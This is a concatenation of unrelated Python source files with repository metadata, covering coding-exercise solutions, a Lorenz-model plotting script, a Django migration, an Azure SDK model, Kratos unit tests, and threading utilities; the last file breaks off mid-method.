ad9064e708a629da144f757f5219de9f0fe28990 | 81e6391b9db249296ec84f6524093cf41b581f31 | /단계별로 풀어보기/18. 큐, 덱/[11866] 요세푸스 문제 0.py | 036703aae87a0030be4e80cef574bbad953c51d2 | [] | no_license | jaeehooon/baekjoon_python | e991be4b510d642f72f625b898d20451dc920d7c | 295776309a883338bfbf51c33caf6dc6629493ca | refs/heads/master | 2023-04-15T14:22:21.281930 | 2021-04-26T02:15:09 | 2021-04-26T02:15:09 | 294,137,750 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | import sys
from collections import deque
class MyDeque(object):
def __init__(self, size):
self.dq = deque(i for i in range(1, size + 1))
def remove(self, kth):
for _ in range(kth - 1):
self.dq.append(self.dq.popleft())
return self.dq.popleft()
def size(self):
return len(self.dq)
if __name__ == '__main__':
N, K = map(int, sys.stdin.readline().split())
result = list()
dq = MyDeque(N)
while dq.size() != 0:
result.append(dq.remove(K))
print(str(result).replace("[", '<').replace("]", ">"))
| [
"qlenfr0922@gmail.com"
] | qlenfr0922@gmail.com |
d4d9d009198e4aa20e9f0cf82447cf8d32471e26 | 0fe11fbe31be719a253c0b2d9e41e20fedc2c40f | /dapper/mods/LorenzUV/illust_LorenzUV.py | 212f07e00e12c2a3c7334ea3bcc7de4151b5083c | [
"MIT"
] | permissive | lijunde/DAPPER | 148ff5cefb92d1bb01c78bd4a82a6f1ecdebdad2 | dc92a7339932af059967bd9cf0a473ae9b8d7bf9 | refs/heads/master | 2020-12-10T21:44:54.468785 | 2019-09-24T18:18:36 | 2019-09-24T18:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | # Quick illustration.
# Sorry for the mess.
from dapper import *
from matplotlib import cm
# Setup
sd0 = seed(4)
# from dapper.mods.LorenzUV.wilks05 import LUV
from dapper.mods.LorenzUV.lorenz95 import LUV
nU, J = LUV.nU, LUV.J
dt = 0.005
t0 = np.nan
K = int(10/dt)
step_1 = with_rk4(LUV.dxdt,autonom=True)
step_K = with_recursion(step_1,prog=1)
x0 = 0.01*randn(LUV.M)
x0 = step_K(x0,int(2/dt),t0,dt)[-1] # BurnIn
xx = step_K(x0,K ,t0,dt)
# Grab parts of state vector
ii = arange(nU+1)
jj = arange(nU*J+1)
circU = np.mod(ii ,nU)
circV = np.mod(jj,nU*J) + nU
iU = np.hstack([0, 0.5+arange(nU), nU])
def Ui(xx):
interp = (xx[0]+xx[-1])/2
return np.hstack([interp, xx, interp])
# Overlay linear
fg = plt.figure(2)
fg.clear()
ax = fg.gca()
L = 20 # Num of lines to plot
start = int(3e5*dt)
step = 3
for i,Ny in enumerate(range(L)):
k = start + Ny*step
c = cm.viridis(1-Ny/L)
a = 0.8-0.2*Ny/L
plt.plot(iU ,Ui(xx[k][:nU]),color=c,lw=2 ,alpha=a)[0]
if i%2==0:
plt.plot(jj/J,xx[k][circV] ,color=c,lw=0.7,alpha=a)[0]
# Make ticks, ticklabels, grid
ax.set_xticks([])
ym,yM = -4,10
ax.set_ylim(ym,yM)
ax.set_xlim(0,nU)
dY = 4 # SET TO: 1 for wilks05, 4 for lorenz95
# U-vars: major
tU = iU[1:-1]
lU = np.array([str(i+1) for i in range(nU)])
tU = ccat(tU[0],tU[dY-1::dY])
lU = ccat(lU[0],lU[dY-1::dY])
for t, l in zip(tU,lU):
ax.text(t,ym-.6,l,fontsize=mpl.rcParams['xtick.labelsize'],horizontalalignment='center')
ax.vlines(t, ym, -3.78, 'k',lw=mpl.rcParams['xtick.major.width'])
# V-vars: minor
tV = arange(nU+1)
lV = ['1'] + [str((i+1)*J) for i in circU]
for i, (t, l) in enumerate(zip(tV,lV)):
if i%dY==0:
ax.text(t,-5.0,l,fontsize=9,horizontalalignment='center')
ax.vlines(t,ym,yM,lw=0.3)
ax.vlines(t, ym, -3.9, 'k',lw=mpl.rcParams['xtick.minor.width'])
ax.grid(color='k',alpha=0.6,lw=0.4,axis='y',which='major')
# # Convert to circular coordinates
# # Should have used instead: projection='polar'
# def tU(zz):
# xx = (40 + 3*zz)*cos(2*pi*ii/nU)
# yy = (40 + 3*zz)*sin(2*pi*ii/nU)
# return xx,yy
# def tV(zz):
# xx = (80 + 15*zz)*cos(2*pi*jj/nU/J)
# yy = (80 + 15*zz)*sin(2*pi*jj/nU/J)
# return xx,yy
#
#
# # Animate circ
# plt.figure(3)
# lhU = plt.plot(*tU(xx[-1][circU]),'b',lw=3)[0]
# lhV = plt.plot(*tV(xx[-1][circV]),'g',lw=1)[0]
# for k in progbar(range(K),'Plotting'):
# dataU = tU(xx[k][circU])
# dataV = tV(xx[k][circV])
# lhU.set_xdata(dataU[0])
# lhU.set_ydata(dataU[1])
# lhV.set_xdata(dataV[0])
# lhV.set_ydata(dataV[1])
# plt.pause(0.001)
#
#
# # Overlay circ
# from matplotlib import cm
# fg = plt.figure(4)
# fg.clear()
# plt.plot(*tU(4.52*np.ones_like(circU)),color='k',lw=1)[0]
# plt.plot(*tV(0.15*np.ones_like(circV)),color='k',lw=1)[0]
# ax = fg.axes[0]
# ax.set_axis_off()
# ax.set_facecolor('white')
# ax.set_aspect('equal')
# L = 40 # Num of lines to plot
# for Ny in range(L):
# k = 143 + Ny*3
# c = cm.viridis(1-Ny/L)
# a = 0.8-0.2*Ny/L
# plt.plot(*tU(xx[k][circU]),color=c,lw=2,alpha=a)[0]
# plt.plot(*tV(xx[k][circV]),color=c,lw=1,alpha=a)[0]
| [
"patrick.n.raanes@gmail.com"
] | patrick.n.raanes@gmail.com |
ebc47b77e7121455d0580d51a74c276f7501266c | 3e19be3527431ba4949f1dc868158cf4f3ea92c5 | /rps_game/round.py | c5d4208b7de5bd1e5d4c006026c56fe26f079cca | [] | no_license | aldotele/rock_paper_scissors | f61626ba941181c0568045448686e5d14c11d9bb | 6562cd15921d6736705c6490f1614f7335f9c38e | refs/heads/main | 2023-06-13T00:43:10.425229 | 2021-07-06T09:40:15 | 2021-07-06T09:40:15 | 382,092,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | class Round:
choices = {1: "Rock", 2: "Paper", 3: "Scissors"}
def __init__(self, player_1_choice, player_2_choice):
if Round.is_choice_valid(player_1_choice) and Round.is_choice_valid(player_2_choice):
self.player_1_choice = int(player_1_choice)
self.player_2_choice = int(player_2_choice)
self.winner = ""
else:
raise ValueError("choice must be an integer between 1 and 3")
@staticmethod
def is_choice_valid(choice_code):
try:
choice_code = int(choice_code)
if choice_code in Round.choices:
return True
else:
return False
except ValueError:
return False
@staticmethod
def show_options():
for code in Round.choices:
print(f"{code} - {Round.choices[code]}")
if __name__ == '__main__':
pass
| [
"aldo.telese@hotmail.it"
] | aldo.telese@hotmail.it |
28113d33d023705405400f808d2b609e2b69010e | de6ee907b82f52833d8e492e56ffebbd90528eed | /core/migrations/0001_initial.py | c1e82cd59dd68136aab1fdb5e967541ef268f0d1 | [] | no_license | ffabiorj/portfolio | 2c27e25f851790bef85912b07fb341111a117563 | a253742227776ff4d4d2d343cb87eba9599577e2 | refs/heads/master | 2021-06-03T04:24:50.879948 | 2020-04-19T01:44:45 | 2020-04-19T01:44:45 | 125,946,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.0.5 on 2020-04-16 23:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('technology', models.CharField(max_length=20)),
('image', models.FilePathField(path='/img')),
],
),
]
| [
"fabio20rj@gmail.com"
] | fabio20rj@gmail.com |
cea59f25724bc06eaf721cb450fe61b141a9c80d | c733e6b433914a8faba256c7853f5cf2cd39c62a | /Python/Leetcode Daily Practice/DP/combination_sum.py | 6a9cf686a28a7a53a156eff82aed1ccf54c2b5a9 | [] | no_license | YaqianQi/Algorithm-and-Data-Structure | 3016bebcc1f1356b6e5f3c3e588f3d46c276a805 | 2e1751263f484709102f7f2caf18776a004c8230 | refs/heads/master | 2021-10-27T16:29:18.409235 | 2021-10-14T13:57:36 | 2021-10-14T13:57:36 | 178,946,803 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | """
Input: {1, 2, 3, 7}, S=6
Output: True
The given set has a subset whose sum is '6': {1, 2, 3}
"""
# brute-force
# top-down with memo
# bottom up
def combination_sum_brute_force(num, sum_val):
# o(2**n)
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 or idx >= len(num):
return -1
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
return 1
return dfs(idx + 1, sum_val)
return dfs(0, sum_val)
def combination_sum_top_down_memo(num, sum_val):
# dp[num_idx][sum_val]
n = len(num)
dp = [[-1 for _ in range(sum_val+1)] for _ in range(n)]
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 and idx >= len(num):
return -1
# print(idx, sum_val)
if dp[idx][sum_val] == -1:
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
dp[idx][sum_val] = 1
return 1
else:
dp[idx][sum_val] = dfs(idx + 1, sum_val)
return dp[idx][sum_val]
return dfs(0, sum_val)
def combination_sum_bottom_up(num, sum_val):
# dp[num_idx][sum_val]
m = len(num)
n = sum_val + 1
dp = [[False for x in range(sum_val+1)] for y in range(len(num))]
# populate the sum = 0 columns, as we can always form '0' sum with an empty set
for i in range(0, len(num)):
dp[i][0] = True
# with only one number, we can form a subset only when the required sum is
# equal to its value
for s in range(1, sum_val+1):
dp[0][s] = True if num[0] == s else False
for i in range(1, m):
for j in range(1, n):
if dp[i-1][j]:
dp[i][j] = dp[i-1][j]
elif num[i] <= j:
dp[i][j] = dp[i-1][j - num[i]]
return dp[-1][-1]
def combination_sum_optimize_bottom_up(num, sum_val):
dp = [0] * (sum_val + 1)
dp[0] = 1
for i in range(len(num)):
for j in range(1, sum_val + 1):
if dp[j]:
continue
elif num[i] <= j:
dp[j] = dp[j-num[i]]
return dp[-1]
print(combination_sum_optimize_bottom_up([1,2,3,7], 6))
| [
"alicia.qyq@gmail.com"
] | alicia.qyq@gmail.com |
62f3947d4ae61f1cc720aa085837534f53774018 | e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14 | /top/api/rest/InventoryAdjustTradeRequest.py | 4da3e858af12147c95f9d7d992b46d0d33f834f9 | [] | no_license | htom78/taobao_comet_py | 9224dbca1a413a54bcc5569873e4c7a9fc9ba059 | ad8b2e983a14d3ab7665244449f79dd72f390815 | refs/heads/master | 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | '''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class InventoryAdjustTradeRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.biz_unique_code = None
self.items = None
self.operate_time = None
self.tb_order_type = None
def getapiname(self):
return 'taobao.inventory.adjust.trade'
| [
"tomhu@ekupeng.com"
] | tomhu@ekupeng.com |
6fd38298e6c06da5b7a9c85a6acb9e33eaaa8531 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_12_01/models/flow_log_information.py | ad2b8721b840a00057bc3671a586e0b6b65dddb0 | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 1,856 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
:param target_resource_id: The ID of the resource to configure for flow
logging.
:type target_resource_id: str
:param storage_id: ID of the storage account which is used to store the
flow log.
:type storage_id: str
:param enabled: Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
:type retention_policy: :class:`RetentionPolicyParameters
<azure.mgmt.network.v2016_12_01.models.RetentionPolicyParameters>`
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, target_resource_id, storage_id, enabled, retention_policy=None):
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
| [
"Raliclo@gmail.com"
] | Raliclo@gmail.com |
97e33fe4f5d5aefa00b2158878f7bc01c15bd8ec | dc99adb79f15b3889a7ef6139cfe5dfc614889b8 | /Aplikace_1_0/Source/ewitis/data/db.py | 26dacf3f02ebbf16712e8a6bc349676538d6df44 | [] | no_license | meloun/ew_aplikace | 95d1e4063a149a10bb3a96f372691b5110c26b7b | f890c020ad8d3d224f796dab3f1f222c1f6ba0eb | refs/heads/master | 2023-04-28T06:43:12.252105 | 2023-04-18T19:59:36 | 2023-04-18T19:59:36 | 2,674,595 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | '''
Created on 8.12.2013
@author: Meloun
'''
import libs.sqlite.sqlite as sqlite
#=======================================================================
# DATABASE
#=======================================================================
print "I: Database init"
try:
db = sqlite.sqlite_db("db/test_db.sqlite")
db.connect()
except:
print "E: Database"
| [
"lubos.melichar@gmail.com"
] | lubos.melichar@gmail.com |
7605014773f49f01d2f7d6e63c97b2e5e3735fd1 | da687718aa8ce62974090af63d25e057262e9dfe | /cap12-dicionarios/dicionarios_aninhados/inventario2.py | 16e00d7872c4b80f9ecb062d75e3ca72f267f1e7 | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | #!/usr/bin/env python3
inventory = {'Sword': {'attack': 5, 'defence': 1,
'weight':15, 'price': 2},
'Armor':{'attack':0, 'defence': 10,
'weight':25, 'price': 5}
}
for name, item in inventory.items():
print('{0}: {1[attack]} {1[defence]} {1[weight]} {1[price]}'.format(name, item))
| [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
ebb3dff07a902763e88bf53719711bec7c75ff06 | ae6c2a6fa37613ac31b2bd3537b3276c9b333632 | /search/migrations/0012_auto_20170822_1207.py | 576f43db2917f84833616caefcb3759c3b8b7f67 | [
"Apache-2.0"
] | permissive | salopensource/sal | 435a31904eb83048c02c9fbff02bbf832835d1b4 | 0895106c6729d5465da5e21a810e967a73ed6e24 | refs/heads/main | 2023-08-03T06:53:40.142752 | 2023-07-28T15:51:08 | 2023-07-28T15:51:08 | 35,883,375 | 227 | 94 | Apache-2.0 | 2023-07-28T15:51:10 | 2015-05-19T13:21:57 | Python | UTF-8 | Python | false | false | 451 | py | # Generated by Django 1.10 on 2017-08-22 19:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('search', '0011_auto_20170810_1205'),
]
operations = [
migrations.AlterField(
model_name='savedsearch',
name='name',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
| [
"graham@grahamgilbert.com"
] | graham@grahamgilbert.com |
ca4adf24f6c210b339e3770daa1efd98e8b87ce2 | d5fbec8208b9a65032bdd2b550c7dde795d5661b | /kratos/tests/test_time_discretization.py | 34fec9075ad0f9577ad12f0fb7482af71a49a096 | [
"BSD-3-Clause"
] | permissive | Ginux1994/Kratos | 9dc5f7b5a427b0a258cd01fbd0bffae19571a81a | 2893e855a07e5cb3b0e6bc549c646fca4a525a99 | refs/heads/master | 2020-04-10T16:49:50.748887 | 2018-12-10T09:43:37 | 2018-12-10T09:43:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,588 | py | from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestTimeDiscretization(KratosUnittest.TestCase):
def test_BDF1(self):
bdf = KM.BDF1()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 2)
self.assertAlmostEqual(coeffs[0], 1.0/delta_time)
self.assertAlmostEqual(coeffs[1], -1.0/delta_time)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 2)
def test_BDF2(self):
bdf = KM.BDF2()
delta_time = 0.11
prev_delta_time = 0.089
coeffs = bdf.ComputeBDFCoefficients(delta_time, prev_delta_time)
self.assertEqual(len(coeffs), 3)
rho = prev_delta_time / delta_time;
time_coeff = 1.0 / (delta_time * rho * rho + delta_time * rho);
self.assertAlmostEqual(coeffs[0], time_coeff * (rho * rho + 2.0 * rho))
self.assertAlmostEqual(coeffs[1], -time_coeff * (rho * rho + 2.0 * rho + 1.0))
self.assertAlmostEqual(coeffs[2], time_coeff)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 3)
def test_BDF3(self):
bdf = KM.BDF3()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 4)
self.assertAlmostEqual(coeffs[0], 11.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[1], -18.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[2], 9.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[3], -2.0/(6.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 4)
def test_BDF4(self):
bdf = KM.BDF4()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 5)
self.assertAlmostEqual(coeffs[0], 25.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[1], -48.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[2], 36.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[3], -16.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[4], 3.0/(12.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 5)
def test_BDF5(self):
bdf = KM.BDF5()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 6)
self.assertAlmostEqual(coeffs[0], 137.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -200.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 75.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -12.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 6)
def test_BDF6(self):
bdf = KM.BDF6()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 7)
self.assertAlmostEqual(coeffs[0], 147.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -360.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 450.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -400.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 225.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -72.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[6], 10.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 7)
def test_Newmark(self):
gen_alpha = KM.Newmark()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.25)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.5)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_Bossak(self):
gen_alpha = KM.Bossak()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_GeneralizedAlpha(self):
gen_alpha = KM.GeneralizedAlpha()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertAlmostEqual(gen_alpha.GetAlphaF(), 0.0)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
if __name__ == '__main__':
KratosUnittest.main()
| [
"philipp.bucher@tum.de"
] | philipp.bucher@tum.de |
4def4a44ca4457ea04f4023ba49dae670040dc78 | bc183f7357cda3ad064f8c2ff34a176c406446d3 | /pastepwn/util/threadingutils.py | 54451a26289cd5ba3667d162722837819e9aadcf | [
"MIT"
] | permissive | luton1507/pastepwn | b8a790168ce08f10c62574eeb0a68f0dedd5425d | 9b2fee22857e54a5312fdb3d388b472a7d271c50 | refs/heads/master | 2022-11-10T20:18:40.102277 | 2020-06-19T23:34:14 | 2020-06-19T23:34:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | # -*- coding: utf-8 -*-
import logging
from threading import Thread, current_thread
def start_thread(target, name, exception_event, *args, **kwargs):
"""
Starts a thread passed as argument and catches exceptions that happens during execution
:param target: Method to be executed in the thread
:param name: Name of the thread
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the threaded method
:param kwargs: Keyword-Arguments to be passed to the threaded method
:return:
"""
thread = Thread(target=thread_wrapper, name=name, args=(target, exception_event) + args, kwargs=kwargs)
thread.start()
return thread
def thread_wrapper(target, exception_event, *args, **kwargs):
"""
Wrapper around the execution of a passed method, that catches and logs exceptions
:param target: Method to be executed
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the target method
:param kwargs: Keyword-Arguments to be passed to the target method
:return:
"""
thread_name = current_thread().name
logger = logging.getLogger(__name__)
logger.debug('{0} - thread started'.format(thread_name))
try:
target(*args, **kwargs)
except Exception:
exception_event.set()
logger.exception('unhandled exception in %s', thread_name)
raise
logger.debug('{0} - thread ended'.format(thread_name))
def join_threads(threads):
"""
End all threads and join them back into the main thread
:param threads: List of threads to be joined
:return:
"""
logger = logging.getLogger(__name__)
for thread in threads:
logger.debug("Joining thread {0}".format(thread.name))
thread.join()
logger.debug("Thread {0} has ended".format(thread.name))
| [
"d-Rickyy-b@users.noreply.github.com"
] | d-Rickyy-b@users.noreply.github.com |
5955661160554d40102fc8a32fa5b056bbf75e99 | f0a4ba1f1f941092e68e4b1ef9cff0d3852199ef | /Do_it!/5.재귀 알고리즘/비재귀적 표현-재귀를제거.py | 5c4d998075cc37ef533ac96b4ff5819b45653e53 | [] | no_license | lsb530/Algorithm-Python | d41ddd3ca7675f6a69d322a4646d75801f0022b2 | a48c6df50567c9943b5d7218f874a5c0a85fcc6d | refs/heads/master | 2023-06-18T04:36:09.221769 | 2021-06-28T16:49:35 | 2021-06-28T16:49:35 | 367,775,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | # 스택으로 재귀 함수 구현하기(재귀를 제거)
from stack import Stack # stack.py의 Stack 클래스를 임포트
def recur(n: int) -> int:
"""재귀를 제거한 recur() 함수"""
s = Stack(n)
while True:
if n > 0:
s.push(n) # n값을 푸시
n = n - 1
continue
if not s.is_empty(): # 스택이 비어있지 않으면
n = s.pop() # 저장한 값을 n에 팝
print(n)
n = n - 2
continue
break
x = int(input('정숫값을 입력하세요 : '))
recur(x)
| [
"lsb530@naver.com"
] | lsb530@naver.com |
437500d29d4bb52a2d7175702b3a9674cc625015 | 0562a138eaa1b460a6bf94f4a724b32a79186900 | /aat/common.py | 55e9be1071ca53160b581ef93e4a7e908cf04fc9 | [
"Apache-2.0"
] | permissive | sylinuxhy/aat | 15dc00bda32aed91aaad5c6122982114874342e4 | 8113365e6f0c307156d43c0dee594bf66ff8b4fa | refs/heads/main | 2023-01-28T06:49:58.646911 | 2020-12-05T01:31:15 | 2020-12-05T01:31:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,554 | py | import os
import itertools
import functools
import pandas as pd # type: ignore
@functools.lru_cache()
def _in_cpp():
_cpp = os.environ.get("AAT_USE_CPP", "").lower() in ("1", "on")
try:
from aat.binding import ( # type: ignore # noqa: F401
SideCpp,
EventTypeCpp,
DataTypeCpp,
InstrumentTypeCpp,
OrderTypeCpp,
OrderFlagCpp,
OrderBookCpp,
ExchangeTypeCpp,
InstrumentCpp,
DataCpp,
EventCpp,
OrderCpp,
TradeCpp,
)
except ImportError:
if _cpp:
# raise if being told to use c++
raise
return False
return _cpp
def id_generator():
__c = itertools.count()
def _gen_id():
return next(__c)
return _gen_id
def _merge(lst1, lst2, sum=True):
"""merge two lists of (val, datetime) and accumulate"""
df1 = pd.DataFrame(lst1, columns=("val1", "date1"))
df1.set_index("date1", inplace=True)
# df1.drop_duplicates(inplace=True)
df2 = pd.DataFrame(lst2, columns=("val2", "date2"))
df2.set_index("date2", inplace=True)
# df2.drop_duplicates(inplace=True)
df = df1.join(df2, how="outer")
# df = pd.concat([df1, df2], axis=1)
df.fillna(method="ffill", inplace=True)
df.fillna(0.0, inplace=True)
if sum:
df = df.sum(axis=1)
else:
df = df.mean(axis=1)
df = df.reset_index().values.tolist()
return [(b, a.to_pydatetime()) for a, b in df]
| [
"t.paine154@gmail.com"
] | t.paine154@gmail.com |
72343fcac5794c27da7dd3512015ec98664b8821 | f5d1ef8ea6173b3b380fa2985fe346162a0b68b3 | /740_Delete_and_Earn.py | fb379e2b588d56ce1b72bdf0c95366aea22dbdde | [] | no_license | ZDawang/leetcode | a66801a2ed5b06ee4e489613885a22e3130618c7 | a46b07adec6a8cb7e331e0b985d88cd34a3d5667 | refs/heads/master | 2021-09-11T15:21:36.496025 | 2018-04-09T06:28:56 | 2018-04-09T06:28:56 | 111,512,346 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#author : zhangdawang
#data: 2017-12
#difficulty degree:
#problem: 740_Delete_and_Earn
#time_complecity:
#space_complecity:
#beats:
from collections import Counter
class Solution(object):
#DP
#使用dp[i]来存储到第i小个数,且删除第i小个数所获得的最大分数
#所以如果第i小个数=第i-1小个数+1:dp[i] = max(dp[j] for j in range(i - 1)) + n * c
#否则dp[i] = max(dp[j] for j in range(i)) + n * c
#空间O(n),时间最差O(nlogn)(排序)
def deleteAndEarn(self, nums):
if not nums: return 0
#计数并从小到大排序
count = sorted(Counter(nums).items(), key = lambda x: x[0])
dp = [0] * len(count)
#用来存放0到第i-2个数(包括第i-2)的最大点数。
maxpoint = 0
for i, (n, c) in enumerate(count):
if n - 1 == count[i - 1][0]:
dp[i] = maxpoint + n * c
else:
dp[i] = max(maxpoint, dp[i - 1]) + n * c
maxpoint = max(maxpoint, dp[i - 1])
return max(dp[-1], maxpoint)
#优化空间复杂度,O(1),错了,还是O(n),count占的空间
def deleteAndEarn2(self, nums):
count = sorted(Counter(nums).items(), key = lambda x: x[0])
cur, pre, mp = 0, 0, 0
for i, (n, c) in enumerate(count):
cur = (mp if n - 1 == count[i - 1][0] else max(mp, pre)) + n * c
mp, pre = max(mp, pre), cur
return max(cur, mp)
nums = [1,1,1,2,4,5,5,5,6]
solute = Solution()
res = solute.deleteAndEarn(nums) | [
"zdawang@bupt.edu.cn"
] | zdawang@bupt.edu.cn |
171ed97b60c4f2239961de9c02cdc8a7beeb2300 | 8981902427dc577228dfd5611c6afe86c3e2e9e2 | /dsmr_stats/management/commands/dsmr_stats_fake_development_data.py | 0539470d7d311df505ea9ed974563875060356e9 | [] | no_license | genie137/dsmr-reader | 5515f4f92bb05bcf00f0e8a0fbd1a018d408950b | 4d934b4838cb2de4a66ff193f4f3095e9beecd99 | refs/heads/master | 2020-03-21T18:14:05.182137 | 2018-06-12T14:54:55 | 2018-06-12T14:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,248 | py | from decimal import Decimal
from time import sleep
import random
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
from django.conf import settings
from django.db import models
from dsmr_stats.models.statistics import DayStatistics, HourStatistics
from dsmr_consumption.models.consumption import ElectricityConsumption
from dsmr_datalogger.models.reading import DsmrReading
class Command(BaseCommand):
help = _('Alters any stats generate to fake data. DO NOT USE in production! Used for integration checks.')
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--ack-to-mess-up-my-data',
action='store_true',
dest='acked_warning',
default=False,
help=_('Required option to acknowledge you that you WILL mess up your data with this.')
)
def handle(self, **options):
""" InfiniteManagementCommandMixin listens to handle() and calls run() in a loop. """
if not settings.DEBUG:
raise CommandError(_('Intended usage is NOT production! Only allowed when DEBUG = True'))
if not options.get('acked_warning'):
raise CommandError(_('Intended usage is NOT production! Force by using --ack-to-mess-up-my-data'))
self._randomize()
def _randomize(self):
